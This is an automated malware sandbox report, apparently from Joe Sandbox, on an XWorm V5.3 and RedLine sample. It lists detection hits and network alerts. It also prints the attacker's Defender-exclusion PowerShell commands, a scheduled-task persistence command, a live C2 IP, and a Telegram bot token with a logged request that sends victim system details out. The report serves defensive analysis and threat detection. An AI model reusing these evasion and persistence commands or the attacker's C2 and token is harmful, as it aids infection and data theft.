Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\mstc.exe, EventID: 13, EventType: SetValue, Image: C:\ProgramData\XClient.exe, ProcessId: 7468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mstc

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\XClient.exe" , ParentImage: C:\ProgramData\XClient.exe, ParentProcessId: 7468, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe', ProcessId: 7668, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\XClient.exe" , ParentImage: C:\ProgramData\XClient.exe, ParentProcessId: 7468, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe', ProcessId: 7156, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\XClient.exe" , ParentImage: C:\ProgramData\XClient.exe, ParentProcessId: 7468, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe', ProcessId: 7156, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\XClient.exe" , ParentImage: C:\ProgramData\XClient.exe, ParentProcessId: 7468, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe', ProcessId: 7668, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\mstc.exe, EventID: 13, EventType: SetValue, Image: C:\ProgramData\XClient.exe, ProcessId: 7468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mstc

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\XClient.exe, ProcessId: 7468, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mstc.lnk

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "mstc" /tr "C:\Users\user\AppData\Local\Temp\mstc.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "mstc" /tr "C:\Users\user\AppData\Local\Temp\mstc.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ProgramData\XClient.exe" , ParentImage: C:\ProgramData\XClient.exe, ParentProcessId: 7468, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "mstc" /tr "C:\Users\user\AppData\Local\Temp\mstc.exe", ProcessId: 2984, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\XClient.exe" , ParentImage: C:\ProgramData\XClient.exe, ParentProcessId: 7468, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe', ProcessId: 7668, ProcessName: powershell.exe

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 91.92.252.220 - Destination IP: 192.168.2.9

Timestamp:	04/24/24-02:54:09.223298
SID:	2852870
Source Port:	7000
Destination Port:	49725
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.9 - Destination IP: 91.92.252.220

Timestamp:	04/24/24-02:53:39.286910
SID:	2855924
Source Port:	49725
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.9 - Destination IP: 91.92.252.220

Timestamp:	04/24/24-02:54:09.229919
SID:	2852923
Source Port:	49725
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 91.92.252.220 - Destination IP: 192.168.2.9

Timestamp:	04/24/24-02:54:00.388941
SID:	2852874
Source Port:	7000
Destination Port:	49725
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Output.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\ProgramData\XClient.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\ProgramData\build.exe	Avira: detection malicious, Label: TR/RedLine.AJ

Found malware configuration

Source: 00000002.00000002.2585450577.0000000002961000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "91.92.252.220"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "mstc.exe", "Version": "XWorm V5.3", "Telegram URL": "https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672"}
Source: 1.2.Output.exe.12441908.1.raw.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["91.92.252.220:9078"], "Bot Id": "IDS"}

Multi AV Scanner detection for domain / URL

Source: http://91.92.252.220:9078/	Virustotal: Detection: 9%	Perma Link
Source: http://91.92.252.220:9078	Virustotal: Detection: 9%	Perma Link
Source: 91.92.252.220	Virustotal: Detection: 11%	Perma Link
Source: 91.92.252.220:9078	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\XClient.exe	Virustotal: Detection: 69%	Perma Link
Source: C:\ProgramData\build.exe	ReversingLabs: Detection: 95%
Source: C:\ProgramData\build.exe	Virustotal: Detection: 78%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Virustotal: Detection: 69%	Perma Link

Multi AV Scanner detection for submitted file

Source: Output.exe	ReversingLabs: Detection: 55%
Source: Output.exe	Virustotal: Detection: 57%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\XClient.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\build.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Output.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: 127.0.0.1,91.92.252.220
Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: 7000
Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: <123456789>
Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: <Xwormmm>
Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: XWorm V5.3
Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: mstc.exe
Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: %Temp%
Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: bc1q7p5qe345uqww9e4ut3nt08tu2lsgnvfsc40azt
Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: 0x797460dC66e416bead591be98635aaafB836b8e7
Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: TKojtDLFNx6pFPXDuM3QV6FivRUeQzyRWA
Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: 2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo
Source: 2.2.XClient.exe.12971a78.0.raw.unpack	String decryptor: 966649672

Source: Output.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49720 version: TLS 1.2

Source: Output.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 00000003.00000002.2573255504.000000000095F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 00000003.00000002.2573255504.000000000095F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 00000003.00000002.2573255504.0000000000911000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @fo.pdb source: build.exe, 00000003.00000002.2572212279.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: build.exe, 00000003.00000002.2573255504.00000000009AD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: build.exe, 00000003.00000002.2573255504.000000000095F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 00000003.00000002.2573255504.00000000009AD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 00000003.00000002.2573255504.000000000095F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HPZoHC:\Windows\System.ServiceModel.pdb source: build.exe, 00000003.00000002.2572212279.00000000006F7000.00000004.00000010.00020000.00000000.sdmp

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 91.92.252.220:7000 -> 192.168.2.9:49725
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 91.92.252.220:7000 -> 192.168.2.9:49725
Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.9:49725 -> 91.92.252.220:7000
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.9:49725 -> 91.92.252.220:7000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 127.0.0.1
Source: Malware configuration extractor	URLs: 91.92.252.220
Source: Malware configuration extractor	URLs: 91.92.252.220:9078

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.92.252.220 ports 7000,9078,0,7,8,9

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.0.XClient.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.XClient.exe.12971a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mstc.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\XClient.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.9:49706 -> 91.92.252.220:9078

Source: global traffic	HTTP traffic detected: GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A09B6D1F69BB0E33E6F7A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%203TYHZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: THEZONEBG THEZONEBG

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.252.220

Source: global traffic	HTTP traffic detected: GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A09B6D1F69BB0E33E6F7A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%203TYHZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.000000000272F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.252.220:9078
Source: build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.252.220:9078/
Source: XClient.exe, 00000002.00000002.2585450577.0000000002A93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: XClient.exe, 00000002.00000002.2632132964.000000001C576000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1759694372.00000136A6C58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: XClient.exe, 00000002.00000002.2585450577.0000000002961000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, XClient.exe, 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, mstc.exe.2.dr, XClient.exe.1.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000005.00000002.1410582309.000001CD41E44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1540160968.00000242DF871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1728788196.000001369E490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2029145272.00000177DD2BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1390192954.000001CD3041A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://osoft.co
Source: powershell.exe, 0000000F.00000002.1804184140.00000177CD479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 00000005.00000002.1391396246.000001CD31FF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1449141258.00000242CFA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1592886665.000001368E649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1804184140.00000177CD479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.000000000273C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: XClient.exe, 00000002.00000002.2585450577.0000000002961000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.000000000272F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1391396246.000001CD31DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1449141258.00000242CF801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1592886665.000001368E421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1804184140.00000177CD251000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1391396246.000001CD31FF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1449141258.00000242CFA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1592886665.000001368E649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1804184140.00000177CD479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.000000000273C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: build.exe, 00000003.00000002.2586614803.000000000273C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/
Source: build.exe, 00000003.00000002.2586614803.000000000272F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.000000000273C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectLR
Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: build.exe, 00000003.00000002.2586614803.000000000272F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectT
Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsLR
Source: build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
